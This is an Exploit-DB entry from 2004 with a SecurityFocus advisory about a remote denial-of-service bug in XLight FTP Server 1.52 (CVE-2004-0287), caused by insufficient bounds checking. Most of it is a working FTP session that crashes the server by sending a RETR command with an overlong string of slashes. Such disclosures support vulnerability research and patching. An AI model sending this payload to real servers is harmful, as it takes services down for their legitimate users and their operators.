XLight FTP Server 1.52 - Remote Send File Request Denial of Service Vulnerability

2004-02-16T00:00:00
ID EDB-ID:23701
Type exploitdb
Reporter intuit e.b.
Modified 2004-02-16T00:00:00

Description

XLight FTP Server 1.52 Remote Send File Request Denial Of Service Vulnerability. CVE-2004-0287. Dos exploit for windows platform

                                        
                                            source: http://www.securityfocus.com/bid/9668/info

A remote denial of service vulnerability has been reported to exist in the Send File Request functionality of the XLight FTP server. Due to this issue a remote attacker may be able cause the affected server to crash, denying service to legitimate users. This issue is due to insufficient bounds checking.

Upon successful exploitation an attacker may be able to cause the affected server to crash, denying service to legitimate users.

ftp> open
To www.example.com
Connected to www.example.com.
220 Xlight Server 1.52 ready...
User (www.example.com:(none)): test
331 Password required for test
Password:
230 Login OK.
ftp> literal pasv
227 Entering passive mode .
ftp> literal retr /////////////////////////////////////////
///////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////
//////////////////////////////////////////qwer
Connection closed by remote host.